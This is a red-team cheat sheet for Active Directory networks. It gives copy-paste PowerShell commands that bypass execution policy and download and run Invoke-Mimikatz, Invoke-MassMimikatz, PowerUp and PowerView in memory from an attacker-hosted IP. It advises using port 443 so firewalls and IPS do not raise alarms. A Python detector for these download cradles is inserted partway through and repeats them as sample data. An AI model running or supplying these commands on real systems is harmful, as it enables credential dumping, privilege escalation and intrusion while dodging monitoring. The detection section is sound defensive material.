# Important Scripts & Links

These are some of the important scripts that may be useful to a Red Team while exploring a network with Active Directory. There is a major overlap with the previous section; the difference is that this page is simply a list of scripts along with their usage and commands (where required), whereas the previous section is organised by need or requirement and gives the best script or command for each.

The heading of each tool gives a gist of its use, and each entry contains two parts:

* Link to download the script
* Command to download the script locally and execute it from memory

I have followed the method of downloading the scripts to a local repo and then using them in the PowerShell command to download and execute from memory, since the targeted machines may not have internet access.

I have also used port 443 in the HTTP link, since I use either 80 or 443 for all such activities to avoid any alarms the firewall/IPS may raise. Change it to whichever port you host the scripts on.
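From the defender's side, the pattern described above (an in-memory download cradle that fetches a script over plain HTTP on port 443) stands out clearly in process-creation telemetry. The following Python is an added example written for this page, not code from the original author or from any of the linked projects. It scores constructed sample command lines shaped like the `CommandLine` field of Sysmon Event ID 1 or Security Event 4688; the indicator names and their weights are my own assumptions, not a published standard.

```python
import re
from dataclasses import dataclass

# Constructed sample command lines (not real telemetry). The first mirrors the
# PowerUp invocation on this page; the others are made up for contrast.
SAMPLE_COMMAND_LINES = [
    "powershell.exe -exec Bypass -C \"IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.208:443/PowerUp.ps1');Invoke-AllChecks\"",
    "powershell.exe -NoProfile -Command \"Get-Service | Where-Object Status -eq Running\"",
    "powershell.exe -ep bypass -c \"iex (iwr https://intranet.example.test/deploy.ps1 -UseBasicParsing)\"",
    "powershell.exe -c \"Invoke-Expression (New-Object System.Net.WebClient).DownloadString('http://10.0.0.5:8080/a.ps1')\"",
]

# Indicator patterns: an execute primitive combined with a fetch primitive is the
# cradle itself; the remaining checks catch the tradecraft described on this page.
EXEC_RE = re.compile(r"(?i)\b(iex|invoke-expression)\b")
FETCH_RE = re.compile(r"(?i)(downloadstring|downloaddata|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b)")
BYPASS_RE = re.compile(r"(?i)-(exec|ep|executionpolicy)\s+bypass")
URL_RE = re.compile(r"(?i)\b(https?)://([^/\s'\")]+)")
IPV4_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")

# Weights are an assumption for this example; tune them to your own environment.
WEIGHTS = {
    "download-and-execute cradle": 3,
    "execution policy bypass": 1,
    "plaintext HTTP on port 443": 2,
    "script fetched from bare IP address": 1,
}


@dataclass
class Finding:
    command_line: str
    indicators: list
    score: int


def _host_and_port(netloc):
    """Split a URL authority into (host, port); port is None when absent."""
    host, sep, port = netloc.rpartition(":")
    if sep and port.isdigit():
        return host, int(port)
    return netloc, None


def analyze(cmd):
    """Return a Finding for one command line, or None if nothing looks suspicious."""
    indicators = []
    if EXEC_RE.search(cmd) and FETCH_RE.search(cmd):
        indicators.append("download-and-execute cradle")
    if BYPASS_RE.search(cmd):
        indicators.append("execution policy bypass")
    for scheme, netloc in URL_RE.findall(cmd):
        host, port = _host_and_port(netloc)
        # http:// on 443 is the scheme/port mismatch the commands on this page produce
        if scheme.lower() == "http" and port == 443:
            indicators.append("plaintext HTTP on port 443")
        # Legitimate deployment usually comes from a DNS name, not a bare IP
        if IPV4_RE.match(host):
            indicators.append("script fetched from bare IP address")
    if not indicators:
        return None
    return Finding(cmd, indicators, sum(WEIGHTS[i] for i in indicators))


def scan(lines):
    """Analyze every command line; returns Findings ordered by descending score."""
    findings = [f for f in (analyze(line) for line in lines) if f is not None]
    findings.sort(key=lambda f: f.score, reverse=True)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_COMMAND_LINES):
        print(f"score={f.score}: {', '.join(f.indicators)}\n    {f.command_line}")
```

The benign `Get-Service` line produces no finding, while the page's own PowerUp cradle collects every indicator. In practice the same logic would be fed from a SIEM query over PowerShell script-block or process-creation events rather than from the constructed list.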

## Scripts

<details>

<summary>Invoke-MassMimikatz.ps1 # Dump Credentials on remote host</summary>

<https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1>

```
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.121:443/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"
```

</details>

<details>

<summary>Invoke-Mimikatz.ps1 # Dump Credentials from Memory</summary>

<https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1>

```
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.208:443/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"
```

</details>

<details>

<summary>PowerUp.ps1 # Privilege Escalation Checks</summary>

<https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1>

```
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.208:443/PowerUp.ps1');Invoke-AllChecks"
```

</details>

<details>

<summary>PowerView.ps1 # Network &amp; AD Exploration</summary>

<https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1>

```
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('http://192.168.119.208:443/powerview.ps1')"
```

Read more about the commands:

<https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon>

</details>

## Links

{% embed url="https://wadcoms.github.io/#+Exploitation+Windows+No%20Creds+SMB" %}

{% embed url="https://github.com/brianlam38/OSCP-2022/blob/main/cheatsheet-active-directory.md#AD-Lateral-Movement-1" %}

<https://gist.github.com/ssstonebraker/a1964b2f20acc8edb239409b6c4906ce>

